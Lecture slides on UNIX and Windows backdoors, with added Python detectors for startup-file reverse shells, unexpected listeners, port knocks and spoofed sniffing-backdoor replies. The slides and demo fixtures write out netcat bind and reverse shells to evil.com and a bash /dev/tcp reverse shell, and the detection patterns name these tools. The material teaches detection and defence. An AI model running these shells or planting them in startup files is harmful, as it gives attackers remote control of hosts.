CIT 380: Securing Computer Systems
Slide #1: Backdoors and Rootkits

Slide #2: Topics
Backdoors
- Backdoor types
- Netcat backdoors
- Reverse telnet
- Concealing backdoors
Rootkits
- User-mode rootkits
- Kernel rootkits
- Detecting rootkits
- Recovery from a rootkit

Slide #3: Types of Backdoors
- Local privilege escalation
- Remote command execution
- Remote shell access
- Remote GUI control

Slide #4: Starting Backdoors on UNIX
- /etc/inittab (on systemd-based distributions, unit files under /etc/systemd/system fill the same role)
- Startup scripts in /etc/rc.d and /etc/init.d: add a new script, or modify an existing one
- inetd: add a new service to /etc/inetd.conf
- User startup scripts: .bashrc, .login, .cshrc, .xinitrc, .xsession, etc.
- cron: a system or per-user crontab entry that periodically re-launches the backdoor

Slide #5: Starting Backdoors on Windows
- Autostart folders: C:\Documents and Settings\[user]\Start Menu\Programs\Startup (on current versions, C:\Users\[user]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup)
- Startup scripts: C:\Windows\win.ini, System.ini, Wininit.ini, etc.
- Registry keys: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, and many others (RunOnce, the HKCU equivalents, service entries, ...)
- Task Scheduler

Slide #6: Finding Backdoor Scripts
- Manual scan of the locations above: time-consuming and error-prone
- Automatic: UNIX: chkrootkit, Titan; Windows: Autoruns (Sysinternals), which enumerates every autostart location it knows about
- File integrity check: a HIDS such as Tripwire or Osiris, which only helps if the baseline was taken before the compromise
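As an added illustration of the "manual scan" that the last three slides describe (this is example code written for this page, not a tool from the course or from chkrootkit), the script below walks the UNIX startup locations listed on slide 4 and flags lines that look like netcat-style or bash-built-in reverse shells. The patterns, the directory list and the sample files it builds in a scratch directory are all constructed for the example; the paths are relative so that the demo never touches the real system.

```python
import re
import tempfile
from pathlib import Path

# Indicators a hand audit looks for.  Constructed for this example; extend
# with whatever your environment treats as abnormal in a startup file.
SUSPICIOUS = [
    re.compile(r"\bnc\b.*\s-e\s"),                   # netcat executing a program
    re.compile(r"\bncat\b.*(--exec|\s-e)\s"),        # Nmap's ncat equivalent
    re.compile(r"/dev/tcp/"),                        # bash's built-in TCP redirection
    re.compile(r"\bbash\s+-i\b"),                    # interactive shell, typical in reverse shells
    re.compile(r"\b(base64|xxd)\b.*\|\s*(sh|bash)\b"),  # decode-and-run one-liners
]

# The locations from slide 4, plus systemd units.  Relative paths so the
# scan can be rooted at "/" on a live host or at a scratch dir for the demo.
STARTUP_LOCATIONS = [
    "etc/inittab", "etc/inetd.conf", "etc/rc.d", "etc/init.d",
    "etc/systemd/system", "etc/crontab", "etc/cron.d", "var/spool/cron",
    "home",   # per-user .bashrc, .profile, .login, .xsession, ...
]


def iter_startup_files(root: Path):
    """Yield every regular file under the startup locations rooted at root."""
    for rel in STARTUP_LOCATIONS:
        p = root / rel
        if p.is_file():
            yield p
        elif p.is_dir():
            yield from (f for f in p.rglob("*") if f.is_file())


def scan(root: Path):
    """Return (relative path, line number, line) for each suspicious line."""
    hits = []
    for f in iter_startup_files(root):
        try:
            text = f.read_text(errors="replace")
        except OSError:
            continue
        for n, line in enumerate(text.splitlines(), 1):
            if any(p.search(line) for p in SUSPICIOUS):
                hits.append((str(f.relative_to(root)), n, line.strip()))
    return hits


def build_demo_tree(root: Path):
    """Constructed startup files: two clean, three carrying a backdoor."""
    files = {
        "etc/crontab": (
            "SHELL=/bin/sh\n"
            "0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n"
            "*/5 * * * * root nc evil.example 80 -e /bin/sh\n"),          # slide 8 style
        "etc/inetd.conf": (
            "ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd\n"
            "shell stream tcp nowait root /bin/sh sh -c 'nc -l -p 2222 -e /bin/sh'\n"),
        "etc/init.d/sshd": "#!/bin/sh\n/usr/sbin/sshd\n",
        "home/alice/.bashrc": (
            "alias ll='ls -l'\n"
            "bash -i >& /dev/tcp/203.0.113.5/443 0>&1 &\n"),               # bash reverse shell
        "home/bob/.profile": "export PATH=$HOME/bin:$PATH\n",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_demo_tree(root)
        return scan(root)


if __name__ == "__main__":
    for path, n, line in demo():
        print(f"{path}:{n}: {line}")
```

On a real host you would call scan(Path("/")) and review every hit by hand; the pattern list is a starting point, not a signature database, and a backdoor started from a renamed binary or an obfuscated command will not match. That gap is exactly why the slide prefers a file-integrity baseline over pattern matching.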

Slide #7: Netcat Backdoors
# nc -l -p 2222 -e /bin/sh      (server on victim)
$ nc victim.org 2222            (client on attacker host)
[Diagram: the attacker's netcat client and the victim's netcat server joined over the network; on each side stdin and stdout are wired to the socket, so whatever the attacker types is fed to /bin/sh and the shell's output travels back.]
The -e option exists in the original (Hobbit) netcat and as -e/--exec in Nmap's ncat; OpenBSD netcat deliberately omits it, and there the listener syntax is nc -l 2222 without -p.

Slide #8: Reverse Backdoors
What if the firewall blocks port 2222? What if it blocks all incoming connections to victim.org?
Solution: reverse the direction of the connection, so the victim connects out to the attacker.
- Run the listener on the attacker host (evil.com): nc -l -p 80
- Run the client with a shell on the victim host: nc evil.com 80 -e /bin/sh
Port 80 is chosen because outbound web traffic is almost always permitted through the firewall, so the shell rides a connection the firewall expects to see.

Remote-Control Backdoors
- Lists of thousands of such tools exist

Windows Control Tools (page 559)
- VNC
- Dameware
- Back Orifice 2000
- SubSeven

Remote Control Backdoor Capabilities (Table 10.3)
- Pop-up dialogs to dupe the user into entering information
- Keystroke logger
- List detailed system information
- Gather passwords
- Change registry settings
- Remote shell access

BO2K (page 562, Figure 10.3)

Distribution
- E-mail: as an attachment, sent from an infected machine to everyone in its contact list
- In a wrapper program such as a game, a greeting card, etc.
- Once installed, the backdoor e-mails the attacker or notifies via IRC
- ActiveX: sends code from a Web server to a browser, where it is executed; ActiveX can do anything on the user's machine that the user can do
(page 564, Figure 10.4)

Slide #14: Defenses against Backdoors
Detection
- Port scans of your own hosts, e.g. with nmap, to find listeners you did not put there; this catches only backdoors that listen on a port, not reverse or sniffing backdoors
Prevention
- Firewall on the local host
- Use a proxying firewall instead of a packet filter: a proxy speaks the application protocol, so a raw shell tunnelled over port 80 is rejected as non-HTTP rather than waved through as "web traffic"
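An added host-side complement to the external nmap scan (example code written for this page, not from the course): read /proc/net/tcp directly and compare the LISTEN sockets against an allowlist of expected ports. Reading the kernel's table yourself rather than running netstat matters once user-mode rootkits (later in the deck) are in play, since those replace the netstat binary. The sample /proc/net/tcp text below is constructed; the allowlist and the host addresses are assumptions for the demo.

```python
# Constructed /proc/net/tcp excerpt: sshd on 22, cupsd on 127.0.0.1:631,
# an unexplained listener on 2222 (slide 7), and one outbound connection to
# port 80 that could be a reverse backdoor (slide 8).  Addresses and ports
# are little-endian hex, as the kernel prints them.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1002 1 0000000000000000 100 0 0 10 0
   2: 00000000:08AE 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 0000000000000000 100 0 0 10 0
   3: 0500000A:B3E2 057100CB:0050 01 00000000:00000000 00:00000000 00000000     0        0 1004 1 0000000000000000 100 0 0 10 0
"""

TCP_STATES = {
    "01": "ESTABLISHED", "02": "SYN_SENT", "03": "SYN_RECV", "04": "FIN_WAIT1",
    "05": "FIN_WAIT2", "06": "TIME_WAIT", "07": "CLOSE", "08": "CLOSE_WAIT",
    "09": "LAST_ACK", "0A": "LISTEN", "0B": "CLOSING",
}


def decode_addr(hex_addr: str):
    """'0100007F:0277' -> ('127.0.0.1', 631).  The IP is little-endian."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = ".".join(str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text: str):
    """Return one dict per socket row; the header line is skipped."""
    rows = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 10:
            continue
        rows.append({
            "local": decode_addr(fields[1]),
            "remote": decode_addr(fields[2]),
            "state": TCP_STATES.get(fields[3], fields[3]),
            "uid": int(fields[7]),
            "inode": int(fields[9]),   # resolvable to a PID via /proc/*/fd
        })
    return rows


def unexpected_listeners(rows, allowed_ports):
    """Listening ports not on the allowlist, the host-side view of a port scan."""
    return sorted({r["local"][1] for r in rows
                   if r["state"] == "LISTEN" and r["local"][1] not in allowed_ports})


def established_outbound(rows):
    """Established connections, the only trace a reverse backdoor leaves here."""
    return [(r["local"], r["remote"]) for r in rows if r["state"] == "ESTABLISHED"]


def audit(text: str, allowed_ports):
    rows = parse_proc_net_tcp(text)
    return {
        "unexpected_listeners": unexpected_listeners(rows, allowed_ports),
        "established": established_outbound(rows),
    }


if __name__ == "__main__":
    # On a Linux host, read the real table; otherwise use the constructed sample.
    try:
        with open("/proc/net/tcp") as fh:
            text = fh.read()
    except OSError:
        text = SAMPLE_PROC_NET_TCP
    print(audit(text, allowed_ports={22, 631}))
```

Two caveats a practitioner would add. A kernel rootkit can falsify /proc just as easily as a user-mode rootkit replaces netstat, so this check is worth something only alongside the external nmap scan the slide recommends; a port that nmap sees open but /proc/net/tcp does not list is a strong rootkit indicator. And an established connection to port 80 is not suspicious by itself; follow the inode into /proc/<pid>/fd and ask whether the owning process has any business holding it (a /bin/sh with a socket on port 80 does not).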

Slide #15: Concealing Backdoors
Encryption
- Pipe the netcat session through an encryption program
- Use cryptcat or socat (with its OpenSSL addresses); this hides the session contents from a network IDS, but the listening port still shows up in a port scan
Backdoors without ports
- ICMP backdoors: Loki, ICMP tunnel
- Sniffing backdoors

Slide #16: Non-promiscuous Sniffing Backdoors
cd00r captures all traffic addressed to the victim host without opening any port.
- Waits for the appropriate port-knock sequence: connection attempts to a fixed series of ports, in order, from the same source.
- After the knock it can: open a TCP shell port; reverse-telnet a shell to the attacker host; or keep sniffing commands off the wire.
Because nothing listens until the knock arrives, an nmap scan of the victim shows no backdoor port.
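The knock-detection logic at the heart of a cd00r-style backdoor, as an added example written for this page (not cd00r's own code; cd00r's actual sequence and reset behaviour are not described here, so both are assumptions). The same matcher, pointed at an IDS's SYN log, also shows why the trick is hard to spot: the knocks are ordinary connection attempts to closed ports, indistinguishable from scanner noise unless you already know the sequence. The constructed event list interleaves an attacker's knocks with a port scanner's probes.

```python
from collections import defaultdict


class KnockMatcher:
    """Track, per source IP, progress through an ordered sequence of ports.

    feed() returns True on the packet that completes the sequence, which is
    the moment a cd00r-style backdoor would open its shell port.
    """

    def __init__(self, sequence, reset_on_miss=True):
        if not sequence:
            raise ValueError("empty knock sequence")
        self.sequence = tuple(sequence)
        self.reset_on_miss = reset_on_miss
        self.progress = defaultdict(int)   # src ip -> index of next expected port
        self.triggered = []                # sources that completed the sequence

    def feed(self, src: str, dst_port: int, syn: bool = True) -> bool:
        if not syn:                        # only connection attempts count as knocks
            return False
        i = self.progress[src]
        if dst_port == self.sequence[i]:
            i += 1
        elif self.reset_on_miss:
            # Wrong port: start over.  The stray packet may itself be knock 1.
            i = 1 if dst_port == self.sequence[0] else 0
        if i == len(self.sequence):
            self.progress[src] = 0
            self.triggered.append(src)
            return True
        self.progress[src] = i
        return False


SEQUENCE = (7002, 3100, 1998)   # assumed example sequence, not cd00r's


def demo():
    """Constructed SYN events: (source, destination port), in arrival order."""
    m = KnockMatcher(SEQUENCE)
    events = [
        ("198.51.100.9", 22),    # a scanner probing the host
        ("203.0.113.5", 7002),   # attacker: knock 1
        ("198.51.100.9", 7002),  # scanner happens to hit knock 1 too
        ("203.0.113.5", 3100),   # attacker: knock 2
        ("198.51.100.9", 80),    # scanner misses knock 2, its progress resets
        ("203.0.113.5", 1998),   # attacker: knock 3, door opens
        ("198.51.100.9", 3100),
        ("198.51.100.9", 1998),
    ]
    return [src for src, port in events if m.feed(src, port)]


def sequential_scan_opens_door(sequence, reset_on_miss, lo=1, hi=8000):
    """Does a plain in-order port scan from one host complete the sequence?"""
    m = KnockMatcher(sequence, reset_on_miss)
    return any(m.feed("198.51.100.9", p) for p in range(lo, hi + 1))


if __name__ == "__main__":
    print("opened for:", demo())
    print("ascending sequence, no reset, vs. nmap -p1-8000:",
          sequential_scan_opens_door((1998, 3100, 7002), reset_on_miss=False))
```

The second function makes a design point explicit: a matcher that never resets and uses an ascending sequence is opened by any sequential port scan of the host, so a backdoor author either resets on a miss or picks ports out of order. For the defender, the practical signal is the reverse of the matcher: a host that answers connection attempts on a port that was closed a moment ago, right after a burst of SYNs to closed ports from the same source, deserves a look.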

Slide #17: Promiscuous Sniffing Backdoors
1. Install the sniffing backdoor on the victim host.
2. Send the backdoor's commands addressed to the sucker host, another machine on the same network segment.
3. The backdoor, sniffing in promiscuous mode, picks the packets off the wire.
4. The backdoor responds with packets forged to come from the sucker host.
The victim never has an open port or a connection to the attacker under its own address; to the firewall and to the sucker host's logs, the sucker host looks like the endpoint.

Slide #18: Promiscuous Sniffing Backdoors
[Diagram: the attacker host on the Internet sends traffic through the firewall to the sucker host; the victim host, on the same segment, sniffs it and replies with spoofed packets carrying the sucker host's source address.]
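One detection angle for the forged replies in the diagram, as an added example written for this page (not from the course): the spoofed packets carry the sucker host's IP address, but they leave the victim's network card, so on the local segment their Ethernet source MAC is the victim's. A sensor with a trusted IP-to-MAC table can flag the mismatch. The frames, MAC addresses, IP addresses and ARP table below are all constructed for the demo.

```python
import struct


def mac_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(x) for x in ip.split("."))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_frame(src_mac, dst_mac, src_ip, dst_ip, payload=b"") -> bytes:
    """Constructed Ethernet II + IPv4 frame (header checksum left zero)."""
    eth = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s",
                     0x45, 0, 20 + len(payload), 0, 0x4000, 64, 6, 0,
                     ip_bytes(src_ip), ip_bytes(dst_ip))
    return eth + ip + payload


def parse_frame(frame: bytes):
    """Return (src_mac, src_ip, dst_ip) for an IPv4 frame, else None."""
    if len(frame) < 34:
        return None
    _dst_mac, src_mac, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        return None
    src_ip, dst_ip = struct.unpack("!4s4s", frame[26:34])   # IPv4 src/dst at offset 12 of the IP header
    return mac_str(src_mac), ip_str(src_ip), ip_str(dst_ip)


def find_spoofed(frames, arp_table):
    """Flag frames whose IP source, per the trusted table, belongs to a
    different NIC than the one that actually transmitted the frame."""
    alerts = []
    for frame in frames:
        parsed = parse_frame(frame)
        if parsed is None:
            continue
        src_mac, src_ip, dst_ip = parsed
        expected = arp_table.get(src_ip)
        if expected is not None and expected != src_mac:
            alerts.append({"claimed_ip": src_ip, "expected_mac": expected,
                           "actual_mac": src_mac, "dst_ip": dst_ip})
    return alerts


# Assumed segment layout for the demo, matching the slide's three roles.
ARP_TABLE = {
    "10.0.0.5": "00:0c:29:aa:aa:aa",   # victim host
    "10.0.0.6": "00:0c:29:bb:bb:bb",   # sucker host
    "10.0.0.1": "00:0c:29:01:01:01",   # firewall / default gateway
}


def demo():
    gw = ARP_TABLE["10.0.0.1"]
    frames = [
        build_frame("00:0c:29:bb:bb:bb", gw, "10.0.0.6", "203.0.113.5", b"genuine sucker reply"),
        build_frame("00:0c:29:aa:aa:aa", gw, "10.0.0.5", "198.51.100.7", b"victim's own traffic"),
        # the backdoor's reply: victim's NIC, sucker host's IP address
        build_frame("00:0c:29:aa:aa:aa", gw, "10.0.0.6", "203.0.113.5", b"backdoor output"),
    ]
    return find_spoofed(frames, ARP_TABLE)


if __name__ == "__main__":
    for a in demo():
        print(f"{a['claimed_ip']} sent from {a['actual_mac']}, expected {a['expected_mac']}")
```

The check only works on the victim's own segment (the firewall sees the packet after the gateway has rewritten the source MAC) and only until the attacker forges the Ethernet source as well, which a raw-socket backdoor can do; at that point the remaining evidence is the switch port the frame arrived on, or the sucker host itself, which has no socket matching the conversation it is supposedly holding.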